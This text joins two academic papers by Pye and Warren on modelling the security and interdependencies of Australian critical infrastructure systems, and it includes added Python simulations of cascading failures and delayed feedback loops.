The challenges of analysing and modelling such large-scale systems, including their dependency relationships with other systems and their non-linear and time-dependent behaviour, remain largely unresolved. According to McDonald and Bologna (2003), mathematical models of critical infrastructure systems are vague and there are no applicable methodologies for assessing and comprehending the intricacies of critical infrastructure systems. Added to this are the effects of human interaction, both as a susceptibility to instigate failure and as the adaptability needed to manage and recover wayward systems. Modelling these networked critical infrastructure systems is therefore not only about modelling the subject system itself, but also about incorporating the consequential rationality of actual human thinking, responses and reactions, together with the topology and dynamics of these large complex network systems (McDonald & Bologna ibid, Peters et al 2008).
Furthermore, there are additional complexity factors in network systems that are inherently difficult to comprehend (McDonald & Bologna 2003):
- Structural complexity – an increasing number of nodes and of links between nodes;
- Network evolution – the structural linkage could change over time;
195
Graeme Pye and Matthew Warren
- Connection diversity – the links between nodes could have different weightings, directions or capacities;
- Dynamical complexity – the nodes could themselves be non-linear dynamical systems;
- Node diversity – there could be many different node types; and
- Meta-complication – the various complications can influence other network nodes.
Added to this is the fact that critical infrastructures can be intractable systems that are difficult to manage, operate and maintain: large, physical, geographically distributed and highly diverse. They typically consist of networked components or ‘systems within systems’ structures with varying performance, and there are few modelling mediums that can characterise these infrastructures as whole systems (Schulman & Roe 2007).
However, critical infrastructure analysis and modelling using simulation and optimisation-based techniques have played a significant part in examining potential interdiction impacts, and the insights they provide are recognised for mitigating facility loss and prioritising security strengthening efforts. Simulation as an optimisation technique has generally proven valuable in the analysis of vulnerabilities in critical infrastructure networks: system simulations enable the examination of a range of impacts, with either implicit or explicit notions of optimising performance (Murray & Grubesic 2007). Therefore, in the context of assessing system potentiality, reliability and vulnerability, monitoring simulation models of networks in which nodes or links are compromised enables the corresponding changes in connectivity or performance to be documented.
A final important consideration for modelling critical infrastructure systems is the interdependency relationships that exist between differing critical infrastructure systems. Mussington (2002) identifies these relationships as a point at which the knowledge needed for improving critical infrastructure security capabilities is incomplete, and suggests that part of the problem is the complexity of the relationships, which is difficult to model. However, Brown et al (2004) recognise that modelling is a first step in analysing, identifying and answering persistent questions about the potential of ‘real’ critical infrastructure system vulnerabilities.
For example, modelling critical infrastructure systems and the dependent and interdependent relationships or influences between infrastructures can deliver structural insight. Pederson et al (2006) provide a representation of differing infrastructures and their interdependent relationships and likely response connections based on a flooding event scenario that draws a parallel with Hurricane Katrina in New Orleans. In Figure 1 the individual infrastructure networks are each represented on a single plane, and the parallel lines within each plane represent sectors and sub-sectors within that particular infrastructure. The spheres or nodes represent key infrastructure components within that sector; for instance, the energy sector contains electricity generation and distribution and natural gas production and distribution. Dependencies can exist within each infrastructure and between differing internal sectors. The solid lines crossing sectors within a specific infrastructure represent internal dependencies, and the broken lines between different infrastructures represent dependencies that can also exist between different infrastructures, that is, infrastructure interdependencies.
Figure 1 illustrates where the dependencies and interdependencies exist within the greater infrastructure system and highlights where dependency relationships exist and the inherent and potential complexity these relationships bring to infrastructures. Additionally, a model of this nature enables those attempting to manage the chaotic environments of disasters and emergency response during catastrophic events to gain a clear appreciation of where these relationships exist both within and between critical infrastructure systems. Understanding this is important for emergency response decision-makers and agencies responsible for recovery, rescue and restoration, because a failure to understand these dynamics would result in poor coordination and an ineffective response, and thereby in the mismanagement of resources, including supplies, rescue personnel and security teams, which may generate a loss of public confidence or trust and, at worst, loss of human life (Brown et al 2004, Pederson et al 2006).
The analysis and modelling of critical infrastructure systems also offers the potential to determine which interdependencies are susceptible to cascading failures and to identify the divergent system characteristics likely to exacerbate such interconnected infrastructure failures. In particular, where the consumption of services is virtually immediate and no buffering or reserve of resources exists within infrastructures such as telecommunications and electricity grids, this immediacy of resource consumption can lead to potentially instantaneous cascading failures that impact across interdependent critical infrastructure systems. Alternatively, other infrastructures that exhibit buffering characteristics, such as the fuel and gas production and distribution infrastructures that supply physical resources, have a level of reserve within these systems, so that any failure would not necessarily be instantaneous in its effect; rather, the effects would exacerbate over time (Svendsen & Wolthusen 2007). These differences in scenario circumstances and in the characteristics of the critical infrastructure systems involved would by necessity require careful consideration in a modelling context, particularly when seeking to identify, predict and even quantify the effects of cascading incidents among interdependent infrastructure systems. This would add informative value with regard to developing public policies that aim to address critical infrastructure vulnerabilities, and especially those that relate to critical infrastructure system security (Zimmerman & Restrepo 2006).
Figure 1: Infrastructure interdependencies (Pederson et al 2006)
As an alternative approach, Little (2003) suggests that applying analysis and modelling techniques to historical critical infrastructure incidents and events would enable incremental improvements in prediction, forecasting and preparedness for future events and would allow the instigation of new engineering approaches to design and construction, thus enabling critical infrastructure systems to become more robust and better able to withstand and cope with the rigours of natural hazards, crippling failures, accidents and incidents as they occur in the future.
Due to the increasing importance of secure critical infrastructure systems, there is an effort to develop analysis and modelling approaches that can accurately model critical infrastructure system behaviour and identify interdependencies and vulnerabilities to various threats. Some of the potential outcomes of analysis and modelling simulation approaches to assessing critical infrastructure systems may prove beneficial to governments, government agencies, military planning and defence, and community expansion plans. This would reduce costs, enhance critical system redundancy, improve traffic flow, secure data and information protection, and better prepare for and respond to emergencies (Pederson et al 2006). In the context of Australian critical infrastructure system characteristics, however, there are modelling considerations that are particular to the subject critical infrastructure systems’ relevant environment.
4. Critical infrastructure system modelling considerations
Having briefly discussed and identified the generic characteristics of Australian critical infrastructure systems, the following outlines the specific modelling considerations required for representational modelling of critical infrastructure systems, their circumstances and their attributes (Pye & Warren 2008):
- Systematic scoping perspective of the system to be modelled, or part thereof, and the granularity of detail of hierarchical levels within the subject system;
- Identifying system criticality and points of criticality within the subject system;
- Systems are generally transitional (services move from source to destination);
- Systems are distributed in character;
- Systems operate autonomously or semi-autonomously (typically no central control for cooperating subsystems);
- Deadlocking issues (transport, communication);
- System scalability (systems made up of subsystems) and complexity;
- Network-connected systems, stand-alone systems and the relationships between them (dependency and interdependency);
- Operational factors and environmental influences (internal and external);
- System redundancy and backup systems;
- Control and communication (critical pathways, internet);
- Time (temporal) scale dynamics within and around systems;
- Depicting ‘cause and effect’ and possible dynamic changes within the system or systems; and
- System concurrency issues.
The ability to model these systems (incorporating the considerations above) in a relevant context is important to assessing system security and understanding functionality and dynamic behaviours in order to develop strategies that address and maintain the continuity of service. This in part relies upon identifying and protecting key points of infrastructure system concentration, pinch or choke points and remote exposures, in order to maintain high levels of service assurance, continuity, system availability and short system restoration times.
5. System modelling principles
The overarching principle applied to system modelling should incorporate a ‘keep it simple’ approach to the development of such system models. This is important because of the highly complex nature of critical infrastructure systems: the system model must remain representative of the system if the security points within the system are to become visible. To achieve this and to remain consistent in application, the following fundamental modelling principles represent an attempt to focus on the consistent application of modelling techniques as applied to critical infrastructure systems (Pye & Warren 2007).
The research of Pidd (1996) developed five desirable and simple principles to apply to the development of discrete computer simulations or to the use of a programming language; these same principles can also be adapted and used as guides to the development of critical infrastructure system models, as follows (ibid):
- Model Simple, Think Complicated. The modeller must keep in mind that the model itself is a tool to support and extend the thinking, impressions and conceptual understanding of the physical system. Additional complexity is therefore avoided and clear physical system boundaries are established for the system model.
- Be Parsimonious, Start Simple and Add. The problem with the previous principle is identifying where the balance lies between simplicity and complexity. There is no general answer to this problem, but a solution lies in adopting a ‘prototyping approach’ in which the model is developed gradually, starting out with simple assumptions and adding further complexity only as it becomes necessary. This does, however, require continued refinement and revision to avoid adding unnecessary complexity to the model.
- Divide and Conquer, Avoid Mega-models. This is common advice given to those dealing with a complex problem: the aim is to break the problem down by decomposing the system into manageable component parts, applying the previous principle to develop the system model.
- Do Not Fall in Love with Data. The model should drive the data collection, not the other way round. This requires the modeller to develop ideas for the model and its parameters from a selective perspective of which data types are collected, analysed, interpreted and implemented in the model, together with a feedback testing regime to test the model developed.
- Model Building May Feel Like Muddling Through. As the model is an attempt to represent part of reality or an action taken, or to increase understanding, the consideration remains that at some point the model becomes the best representation it can be, and continued ‘muddling’ with the model can be detrimental to assumptions based on the completed model.
These modelling guides adapted from Pidd’s (1996) work illustrate some key points of reference that attempt to maintain consistency when developing, analysing and implementing models within the realm of modelling critical infrastructure systems. They will assist the modeller to (Pye & Warren 2007):
- Categorise and develop an understanding of the problem context for modelling;
- Decide on the model structure based on analysing the available data;
- Determine model realisation, where the parameters of the model have been established;
- Identify a model assessment as the point at which the model is deemed acceptable, valid and usable as a system model that reflects normal functionality; and
- Apply model implementation, by using the model to gain valuable predictive data and likely system scenario responses.
These system modelling principles offer common-sense guidelines that are applicable to modelling critical infrastructure systems and to dealing with the complexities of the characteristics incumbent on critical infrastructure systems.
6. Conceptual system modelling objectives
Furthermore, in conceptually modelling critical infrastructure systems, there are system modelling objectives that provide deliverable insights into critical infrastructure systems through their modelling. From the perspective of system functionality, security characteristics and dynamic behaviour, modelling should strive to deliver, but not be limited to, the following (CIPMA 2007):
- Identify system scope and interconnections between systems both within and across critical infrastructure sectors, incorporating levels of scale and future system scalability;
- Deliver insights into the system behaviours and responses of complex networks and their communication, control and service provision dynamics;
- Identify and analyse the extent and influential magnitude of relationships between cooperating systems, particularly from the aspect of dependency and interdependency relationships;
- Observe, through applied modelling, normal system functionality and predict the potential flow-on effects of critical infrastructure system failure and likely cascading impacts;
- Identify potential system choke points, single points of failure and other likely security vulnerabilities;
- Model assessments of potential security measures for systems prior to their physical implementation;
- Apply risk and security mitigation strategies to test and evaluate the beneficial or otherwise outcomes for continuity planning and development; and
- Models must be conceptually representative of the physically distributed nature and functional characteristics of the subject infrastructure systems.
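As an added illustration (not part of the paper) of the cascading-failure behaviour discussed in Section 3, where immediately consumed services fail instantaneously and buffered ones fail later, and of the Section 6 objectives of locating choke points and single points of failure and assessing a security measure before it is implemented, the following Python model runs a time-stepped cascade over a dependency graph. The sectors, requirement groups, buffer values and the hypothetical ‘generator’ measure are all constructed for illustration and are not data from Pederson et al or the authors.

```python
"""Cascading-failure model over an infrastructure dependency graph.

Added illustration, not the paper's own model or data. Each node needs at
least one working supplier from every one of its requirement groups, so a
group with a single member is a single point of failure and a group with
several members represents redundancy. BUFFER gives the number of time
steps a node keeps operating after a requirement group is lost: 0 models
services consumed immediately (electricity, telecoms), larger values model
physical reserves (fuel, gas, coal stockpiles).
"""

# Constructed sample sectors and dependencies (hypothetical, for illustration).
REQUIRES = {
    "electricity":        [{"natural_gas", "coal"}, {"telecoms"}],
    "telecoms":           [{"electricity"}],
    "water":              [{"electricity"}],
    "natural_gas":        [{"electricity"}],
    "coal":               [{"transport"}],
    "fuel":               [{"electricity"}],
    "transport":          [{"fuel"}],
    "emergency_services": [{"telecoms", "radio"}, {"fuel"}, {"water"}],
    "radio":              [],  # battery-powered fallback, no upstream needs
}
BUFFER = {
    "electricity": 0, "telecoms": 0, "water": 1, "natural_gas": 2, "coal": 4,
    "fuel": 3, "transport": 2, "emergency_services": 1, "radio": 0,
}


def _group_lost_at(group, failed_at):
    """Step at which every supplier in a requirement group had failed, else None."""
    if all(member in failed_at for member in group):
        return max(failed_at[member] for member in group)
    return None


def simulate_cascade(initial_failures, requires=REQUIRES, buffer=BUFFER, max_steps=100):
    """Return {node: step at which it failed} for a given set of initial failures."""
    failed_at = {node: 0 for node in initial_failures}
    for step in range(max_steps + 1):
        changed = True
        while changed:  # iterate to a fixpoint so buffer-0 nodes fail in the same step
            changed = False
            for node, groups in requires.items():
                if node in failed_at:
                    continue
                for group in groups:
                    lost = _group_lost_at(group, failed_at)
                    if lost is not None and lost + buffer[node] <= step:
                        failed_at[node] = step
                        changed = True
                        break
        if len(failed_at) == len(requires):
            break
    return failed_at


def rank_by_impact(requires=REQUIRES, buffer=BUFFER):
    """Rank nodes by how many others fail when that node alone fails (choke points)."""
    impact = {node: len(simulate_cascade({node}, requires, buffer)) - 1 for node in requires}
    return sorted(impact.items(), key=lambda item: (-item[1], item[0]))


def single_points_of_failure(requires=REQUIRES):
    """(supplier, dependent) pairs where the dependent has no alternative supplier."""
    pairs = []
    for node, groups in requires.items():
        for group in groups:
            if len(group) == 1:
                pairs.append((next(iter(group)), node))
    return sorted(pairs)


def add_alternative(requires, node, supplier, alternative):
    """Copy of `requires` in which `node` may use `alternative` instead of `supplier`."""
    copy = {n: [set(g) for g in groups] for n, groups in requires.items()}
    for group in copy[node]:
        if supplier in group:
            group.add(alternative)
    return copy


if __name__ == "__main__":
    print("impact ranking:", rank_by_impact())
    print("single points of failure:", single_points_of_failure())
    before = simulate_cascade({"electricity"})
    # Assess a proposed measure before deployment: a fuel-fed generator
    # (hypothetical) as an alternative power source for telecoms.
    hardened = add_alternative(REQUIRES, "telecoms", "electricity", "generator")
    hardened["generator"] = [{"fuel"}]
    after = simulate_cascade({"electricity"}, hardened, dict(BUFFER, generator=1))
    print("telecoms fails at step", before["telecoms"], "-> with generator:", after["telecoms"])
```

The generator run shows the buffering effect the text describes: the measure delays the telecoms outage rather than preventing it, because the generator itself depends on fuel deliveries that the same outage eventually stops.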
Understanding and appreciating the characteristics and idiosyncrasies of critical infrastructure systems and the specific considerations are the foundations upon which the conceptual modelling of these systems can deliver the modelling objectives listed previously. The modelling of such systems demands of the modeller an intimate understanding and appreciation of the complexities of the subject systems in order to deliver a representative and well-scoped model, for without the knowledge gleaned from analysing system models, any subsequent critical infrastructure system model produced cannot be a representative model.
7. Australia’s critical infrastructure: Discussion and context
Critical infrastructure systems are vitally important to the economy and the community. Particularly with the proliferation of telecommunication and information infrastructures, the profound influence that those critical infrastructures and the services they deliver have on all levels, structures and functionality of the economy and society is apparent. As history has shown, infrastructure innovation has boosted economic growth, contributed to improved public health, changed the mobility of society, improved information networks and brought comfort to the community.
In many aspects, present-day critical infrastructures were laid out to service the development of an industrial economy and, to an extent, seemed inadequate and ill-prepared as the backbone of the new modern economic structure relating to information and knowledge-based services. The service-based economy expects highly reliable, flexible and quality services rather than cheap utilities and commodity-based services. There is continuing public consternation with the performance of some critical infrastructures, particularly where users have tailor-made quality-of-service and service-on-demand expectations that have been plagued with problems of road congestion, power outages, stressed public transport systems, viruses and denial of service attacks on the internet.
It seems that many of the traditional critical infrastructures were slow in adapting to societal demands. This is in part due to their deep ‘embeddedness’ in spatial and economic structure, including the large, long-term capital investment in the physical basis of critical infrastructure systems, which remain barriers to the adoption of timely innovations and to their adaptation to the changing requirements of users and to system security and service availability requirements. However, in contrast to the resistance of physical infrastructures to change, profound and ongoing change has been unleashed in the Australian context in the public ownership, organisation and market structure of critical infrastructure sectors, resulting from de-regulation and privatisation of critical infrastructure systems. Additionally, the convergence of markets and the contraction of ownership into multi-utility organisations will greatly increase the complexity of infrastructure industries and the regulation of infrastructure-bound markets.
The private and public owners in the infrastructure industry now have heightened security obligations with regard to the Australian national security status. This includes maintaining critical infrastructure system availability and the supply of services to industry, business and the wider community, who are increasingly dependent and reliant on critical infrastructure systems. Further compounding this situation is the increasing interconnectedness between infrastructures via the information communication technologies that are increasingly pervading these systems and thereby creating new interactions, interdependencies and dependency relationships. These technological innovations have thus introduced new risks and vulnerabilities while enabling decentralised utility supply, distributed, autonomous control of network operations and the information sharing provided by multifunctional information and communication infrastructures.
The collection of interactive change processes in the Australian infrastructure industry is creating a new generation of critical infrastructures so interwoven with new technologies that traditional approaches to managing spatial planning, policy making, regulation, technology, information and communication, and physical and cyber security require rethinking. Similarly, governments, owners and operators have to take into account their interactions and connections with other critical and non-critical infrastructure systems, particularly in terms of capacity allocation, service provision, system availability planning and security as a function of changing economic and regulatory conditions. Furthermore, understanding critical infrastructure system behaviour and its security implications and vulnerabilities, and mitigating identified security risks, is a current concern of many nations, including Australia.
In terms of a systems thinking perspective and of comprehending the design, operation, management and ultimately the security of any critical infrastructure system, it is important to be able to conceptualise the system goals, performance at differing levels of the greater system structure and the behavioural aspects of subsystems. Structurally, critical infrastructures are large integrated systems comprised of subsystems linked together into a network-organised system. The result is a ‘cause and effect’ influenced system with integrated subsystems and interfaces enabling interactive effects, particularly where an interface represents the contact area between one system and another system element, or between the system and the human, or between the system and its environment. For example, such interactions across an interface may relate to energy and material flows, information exchanges, personal communications, propagation of cause and effect influences, operational decisions and control manipulations.
8. Conclusion
Graeme Pye and Matthew Warren<br />
As Bentley (2006) intimates, critical infrastructure systems tend to be interdependent and even interconnected, and systems failure, be it through natural disaster, terrorism or poor management, can bring entire communities and their industries and utilities to a grinding halt. Therefore, the ability to analyse and critique the security aspects of critical infrastructure systems, together with modelling these systems, offers an avenue for assessing critical infrastructure system security, identifying vulnerabilities and locating inherent weaknesses, so that appropriate solutions and remedial action can be implemented to mitigate such security risks to system availability and service supply. To address this directly and return to the focus of this research, namely how to critique and model critical infrastructure systems, the preceding descriptions of system analysis and modelling approaches have outlined a number of differing methodologies and their characteristics. Additionally, a number of potential system modelling approaches applicable in a security context were characterised; these are potentially both adaptable and suitable for modelling critical infrastructure systems. While each system security analysis approach and system modelling approach reviewed is capable on its own terms, each remains limited and narrow in focus for the analysis and modelling of critical infrastructure systems. Therefore, it is proposed that a possible solution to critiquing and modelling critical infrastructure systems may lie in the development of a generic multifaceted or blended methodology that outlines the adoption of multiple system analysis and modelling approaches. This would represent a hybrid methodology that in turn would form the basis for combining multiple approaches into a single multifaceted practical framework for the security analysis and modelling of a critical infrastructure system.
References
Avison D.E. (2003a), 'Blended Methodologies', in Information Systems Development: Methodologies, Techniques and Tools, 3rd Edition, McGraw Hill, Maidenhead, Berkshire, pp. 379-387.
Avison D.E. (2003b), 'Modelling Themes', in Information Systems Development: Methodologies, Techniques and Tools, 3rd Edition, McGraw Hill, Maidenhead, Berkshire, pp. 73-81.
Bentley A. (2006), 'Infrastructure: Critical Mass', CSIRO Solve, No. 7.
Berntsen K.E., Sampson J. and Osterlie T. (n.d.), Interpretive Research Methods in Computer Science. Online: http://www.idi.ntnu.no/~thomasos/paper/interpretive.pdf Accessed: April 2008.
Brown T., Beyeler W. and Barton D. (2004), 'Assessing infrastructure interdependencies: the challenge of risk analysis for complex adaptive systems', International Journal of Critical Infrastructures, Vol. 1, No. 1, pp. 108-117.
CIPMA (2007), Critical Infrastructure Protection Modelling and Analysis (CIPMA) Program, Fact Sheet, Trusted Information Sharing Network (TISN). Online: http://www.tisn.gov.au Accessed: December 2007.
Dennis A., Wixon B.H. and Roth R.M. (2009), Systems Analysis & Design with UML Version 2.0, 3rd Edition, John Wiley & Sons Inc., New York, USA.
Little R.G. (2003), 'Toward More Robust Infrastructure: Observations on Improving the Resilience and Reliability of Critical Systems', in 36th Hawaii International Conference on System Sciences (HICSS'03), IEEE Computer Society, pp. 58-66.
Macdonald R. and Bologna S. (2003), Advanced Modelling and Simulation Methods and Tools for Critical Infrastructure Protection. Online: http://www.iabg.de/acip/doc/wp4/D4_5_v0_1_RM.pdf Accessed: March 2003.
Murray A.T. and Grubesic T.H. (2007), 'Overview of Reliability and Vulnerability in Critical Infrastructure', in Critical Infrastructure, Springer Berlin Heidelberg, Berlin, pp. 1-8.
Mussington D. (2002), Concepts for Enhancing Critical Infrastructure Protection: Relating Y2K to CIP Research and Development, RAND, Santa Monica, CA, USA.
Pederson P., Dudenhoeffer D., Hartley S. and Permann M. (2006), Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research, Idaho National Laboratory (INL), Idaho Falls.
Peters K., Buzna L. and Helbing D. (2008), 'Modelling of cascading effects and efficient response to disaster spreading in complex networks', International Journal of Critical Infrastructures, Vol. 4, No. 1/2, pp. 46-62.
Pidd M. (1996), 'Five Simple Principles of Modelling', in Proceedings of the 1996 Winter Simulation Conference, ACM, pp. 721-728.
Pye G. and Warren M.J. (2006), 'Security Management: Modelling Critical Infrastructure', Journal of Information Warfare, Vol. 5, No. 1, pp. 46-61.
Pye G. and Warren M.J. (2007), 'Locating Risk through Modelling Critical Infrastructure Systems', in Human Aspects of Information Security & Assurance (HAISA), Plymouth, UK, pp. 87-98.
Schulman P.R. and Roe E. (2007), 'Designing Infrastructures: Dilemmas of Design and the Reliability of Critical Infrastructures', Journal of Contingencies and Crisis Management, Vol. 15, No. 1, pp. 42-49.
Svendsen N.K. and Wolthusen S.D. (2007), 'Connectivity models of interdependency in mixed-up critical infrastructure networks', Information Security Technical Report, Vol. 12, No. 1, pp. 44-55.
Wood-Harper A.T., Antill L. and Avison D.E. (1985), Information Systems Definition: The Multiview Approach, Blackwell Scientific Publications, Oxford.
Zimmerman R. and Restrepo C.E. (2006), 'The next step: quantifying infrastructure interdependencies to improve security', International Journal of Critical Infrastructures, Vol. 2, No. 2/3, pp. 201-214.
Modelling Relational Aspects of Critical Infrastructure Systems
Graeme Pye and Matthew Warren
Deakin University, Geelong, Australia
graeme@deakin.edu.au
mwarren@deakin.edu.au
Abstract: The relational aspects of critical infrastructure systems are not readily quantifiable, as there are numerous variabilities and system dynamics that lack uniformity and are difficult to quantify. Notwithstanding this, there is a large body of existing research founded in the quantitative analysis of critical infrastructure networks, their system relationships and the resilience of these networks. The focus of this research, however, is to investigate a different, more generalised and holistic systems perspective. It suggests that applying network theory and taking a 'soft' system-like modelling approach offers an alternative way of viewing and modelling the relational aspects of critical infrastructure systems that warrants further enquiry.
Keywords: critical infrastructure, dependency relationships, systems modelling
1. Introduction
Modern critical infrastructure systems exist ubiquitously, and what constitutes a system evokes different meanings, perceptions and conceptual visualisations in different individuals, depending on their interpretation of the focal structure. Essentially, a system construct is a derivation of its functional characteristics, physical structure and response behaviours, and incorporates the inferred complexity of components that interact to form a single functional system representation. Systems exist to perform purposeful functions, and they range from a single-function system to a large complex system comprised of numerous subsystems, all working cooperatively for a common intent (Maani & Cavana 2000).
Systems of this structure are characterised as networks, where the components form the nodes that link together to form the network topology, which facilitates interactions between the nodes within the wider network. Many physical infrastructure systems are characterised as networks; power and water distribution grids are large common examples, but there are many less obvious and smaller systems cast in this form. The advantage of viewing systems as networks is that their determining behaviour is largely a result of the pattern or topology of network linkages, rather than of what specifically passes across the links. Therefore, understanding how the network functions as a consequence of its topology can assist in deducing how the system is likely to behave, by investigating its network configuration (Finnigan 2005).
There are many different system structures and configurations that characterise network systems and their dynamic functional behaviours. This paper seeks to outline the premise of future research focussing on a particular network theory as the basis of critical infrastructure system research, and on two interpretative modelling approaches for modelling the relational aspects of dynamic critical infrastructure systems. This will act as a precursor to determining a modelling approach suitable for illustrating the inter-system relationships between dynamic critical infrastructure systems and their dependency and interdependency aspects.
2. System dynamics
System dynamics, as Forrester (1991, p.5) explains, "combines the theory, methods and philosophy needed to analyse the behaviour of systems in not only management, but also in environmental change, politics, economic behaviour, medicine, engineering, and other fields." System dynamics provides a common foundation that, when applied, can deliver insights into changes occurring within systems over time by drawing upon concepts from the field of feedback control.
Therefore, system dynamics is utilised as a method for analysing, studying and managing complex feedback systems. Feedback is the situation where, via a process of 'cause and effect', X influences Y, which in turn influences X. Therefore, the study of X and Y cannot be undertaken independently, as it is the link between X and Y that determines how the system will behave (SDS 2006). This example illustrates the circular process in which dynamic decisions cause changes that in turn influence later decisions within the system structure (Forrester 1998), as shown in Figure 1.
Figure 1: Closed-loop structure of the world (Forrester 1991)
The elementary premise of a feedback system is that each action is in response to the current conditions, and such actions in turn affect further conditions, which become the conditional basis for future action. There is no beginning or end to this feedback process, and it is further complicated by other interconnection relationships and the interactions of human beings (Forrester 1968). As such, the intertwining of many feedback loops can result in local or global cascading chains of actions where a system is reacting to the echo of its own past actions, including the past actions of other entwined systems (Forrester 1994 & 1995, Checkland 2000, Watts 2000).
In reality, system feedback is inevitably what confronts people who are responsible for the operational control of dynamic systems in situations such as industrial production, national economics, global warming or even interpersonal relationships. Contextually, the responses to these problems are manifestly dynamic decisions that require additional and related decisions, because the situation changes both by itself and in response to the previous decisions and actions taken (Jensen & Brehmer 2003). As Warren (2005) identifies, the dynamics of systems require the application of powerful logic to comprehend how systems react to the consequences of changes and decisions taken in their management and control, which adds further complexity to the operation of dynamic systems.
The study of system dynamics is concerned with constructing quantitative and qualitative models of complex problem domains and then investigating the response behaviours of the system models over time. According to Luna-Reyes and Anderson (2003), system dynamics depends heavily on quantitative data to generate feedback models, although the analysis of qualitative data has a role to play at all levels of the modelling challenge. Often the experimentation undertaken with these models demonstrates how unappreciated causal relationships, dynamic complexity and structural delays within the subject system lead to counter-intuitive results from less informed approaches to improving system functionality. Additionally, system dynamics models enable the incorporation of 'soft' factors such as motivation and perception that are advantageous to improved system understanding and management (Caulfield & Maj 2002).
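The effect of a structural delay on a corrective feedback loop can be made concrete with a small simulation. The following is an added illustration, not a model from the paper or from Forrester: a controller adjusts a level toward a target in proportion to the gap it observes, but the observation it acts on is `delay` steps old. Target, gain and delay are constructed parameters. Without the delay the level approaches the target monotonically; with a two-step reporting delay the same policy overshoots and oscillates, which is the counter-intuitive behaviour the paragraph describes.

```python
"""Corrective feedback loop with and without a reporting delay (added illustration)."""


def simulate(target, gain, delay, steps, start=0.0):
    """Each step the controller corrects toward `target` by `gain` times the gap it observes.
    The observation is the true level from `delay` steps ago (before any history exists it
    sees the starting level). Returns the trajectory of the true level, length steps + 1."""
    level = [start]
    for t in range(steps):
        observed = level[t - delay] if t >= delay else start
        level.append(level[t] + gain * (target - observed))
    return level


def overshoot(trajectory, target):
    """How far the level climbs above the target (negative if it never reaches it)."""
    return max(trajectory) - target


def target_crossings(trajectory, target):
    """Number of times the level crosses the target line, a simple oscillation measure."""
    above = [x > target for x in trajectory]
    return sum(1 for a, b in zip(above, above[1:]) if a != b)


def compare(target=100.0, gain=0.5, steps=40):
    """Same policy, same gain; the only difference is whether the controller sees fresh data."""
    prompt = simulate(target, gain, delay=0, steps=steps)   # constructed: no delay
    delayed = simulate(target, gain, delay=2, steps=steps)  # constructed: two-step delay
    return {
        "prompt_overshoot": overshoot(prompt, target),
        "prompt_crossings": target_crossings(prompt, target),
        "delayed_overshoot": overshoot(delayed, target),
        "delayed_crossings": target_crossings(delayed, target),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key:18s} {value}")
```

With these parameters the undelayed loop never exceeds the target, while the delayed loop climbs to 175 against a target of 100 and then swings below it several times before settling, purely because each correction is computed from stale information.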
3. Dynamic systems modelling
Constructing a useful interpretation or model of a dynamic system requires an analysis of the system to deliver a useful understanding of the system situation through elaboration, exploitation and interpretation of the system. While this is heavily reliant on the mental interpretation of the developer, it is a useful representation of a given understanding of the system situation at a given moment, together with the perceived structure of the system (Schaffernicht 2006). There is no single formalised approach applicable to modelling system dynamics; however, Caulfield and Maj (2002) suggest the lessons for modellers are to just start modelling, try things, listen to the advice of experienced modellers and simply iterate, iterate and iterate the model development process.
Modelling the dynamic behaviours within systems offers some potential benefits, including (Caulfield & Maj 2002):
Dynamic system modelling contributes to developing an understanding of the subject system problem domain through the processes of analysis and critical thinking, as applied to a physical system.
A primary benefit of dynamic system modelling lies in its ability to represent not only quantitative or 'hard' system variables such as program size, staffing numbers or cost of investment, but also the qualitative or 'soft' variables that impact system dynamics, such as motivation, commitment, confidence or perceptions. Traditionally, the focus has been on the quantitative variables of the system because of an applied engineering approach, and consideration of the 'soft' variables was thought too difficult to measure and their importance underestimated. Yet the risk of omitting the 'soft' variables is to fail to consider the essential human impact.
System improvement alternatives often come from intuitive insights uncovered during the initial analysis, from the previous experience of the analyst, from proposals put forward by the people operating the system based on their practical experience, and from the skill of imagining creative alternatives. As Senge (1990) indicates, the cause of many problems lies in the well-intentioned policies designed to alleviate them, developed by policymakers lured into designing and applying interventions that focus only on the symptoms and not the underlying causes. This approach produces only short-term benefits and fosters the need for further symptomatic interventions. However, by modelling and simulating the problem domain using a system dynamics model, it is possible to enact decisions from a more informed rational basis, safe from the actual physical dangers of real-world experimentation and complexity (Caulfield & Maj 2002).
4. Complex systems paradigm
In essence, the dynamics within each system are dissimilar because factors such as the structure, environment and complexity of the system itself influence its dynamics. The theoretical study of complex systems has focused on the organisational arrangements that influence the development and persistence of particular system features. It is the relationships between system elements (i.e. structure), rather than the system elements and their properties (i.e. composition), that are significant. The emphasis on structure over composition makes the analytical approach to studying complex systems applicable across disciplines, as many different types of systems can be characterised utilising similar analytical tools (Parrott & Kok 2000).
The increased capabilities of computing power have enabled the investigation of networks consisting of millions of nodes and therefore the exploration of questions that were previously beyond comprehension. This, according to Christensen and Albert (2007), underlines the need to move beyond reductionist approaches, where all complex systems are understood in terms of their simpler components, to an approach that instead attempts to understand the behaviour of the system as a whole.
5. Network systems paradigm
Many physical systems consist of network configurations; for instance, power and water distribution grids are large common examples of networks, but there are many less obvious and smaller systems cast in this form. The advantage of viewing systems as networks is that typically their determining behaviour is largely a result of the pattern or topology of network linkages, rather than of what specifically passes across the links. Therefore, understanding how the network system functions as a consequence of its topology can assist in deducing how the system is likely to behave, by investigating its network configuration (Finnigan 2005).
Interestingly, the network theory research of Watts (2004) draws together the analysis and modelling of networks incorporating dynamic features of real-world systems, where their interactions are characterised as neither entirely ordered nor completely random, but tend to exhibit properties of both. The criteria that are the premise of this network theory are that networks are (Watts 1999a):
Characterised by a large number of connected elements;
Sparse in structure, where each element is connected on average to only a few, and not all, of the other elements of the network;
Decentralised, with no dominant central point of connection;
Clustered, where there is some degree of overlapping inter-nodal connection between elements within neighbouring network clusters.
A feature of this type of distributed network structure is that some of the network elements are more significant than others because of their connectedness with other connected elements, including those within other overlapping clusters.
As Callaway et al (2000) attest, the internet, social networks, airline routes and electric power grids exemplify networks of this nature, whose function and resilience critically rely on the pattern of interconnection between the elemental components of the system. The degree of robustness or fragility of the overall system is largely dependent on the configuration of the network connections. Therefore, Callaway et al (ibid) postulate that if the pattern of connection is appropriately chosen, then the network system can be highly resilient to random loss of network elements, resulting in only minimal localised loss of function.
However, the network would remain susceptible to a targeted attack on specifically chosen and significant network elements or linkages, whose loss would affect the functionality of the entire network system. Watts (1999b) supports this premise too: in the dynamic functional sense of the entire network, local actions within the network system can have causal global consequences. This influence is a product of the relationship between the properties of local and global dynamics, which depend critically on the structural connectivity and topology of the network.
